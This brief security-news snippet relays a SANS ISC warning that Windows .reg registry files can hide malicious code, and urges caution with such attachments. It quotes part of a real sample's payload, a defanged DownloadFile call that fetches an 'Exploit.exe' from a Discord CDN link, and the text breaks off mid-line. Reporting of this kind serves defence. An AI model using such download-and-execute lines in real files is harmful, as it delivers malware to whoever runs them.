SANS ISC shared that “REG” file extensions used to update Windows registry can contain malicious scripts or code … avoid processing these odd type extensions if seen in email or links 

Infected With a .reg File (

Today, I spotted another file that is also interesting: A Windows Registry file (with a “.reg” extension). Such files are text files created by exporting values from the Registry (export) but they can also be used to add or change values in the Registry (import). Being text files, they don’t look suspicious.  Deep in the CODE is —  DownloadFile(‘hxxps://cdn[.]discord***[.]com/attachments/847773813131182112/868160361466040321/Exploit.exe‘,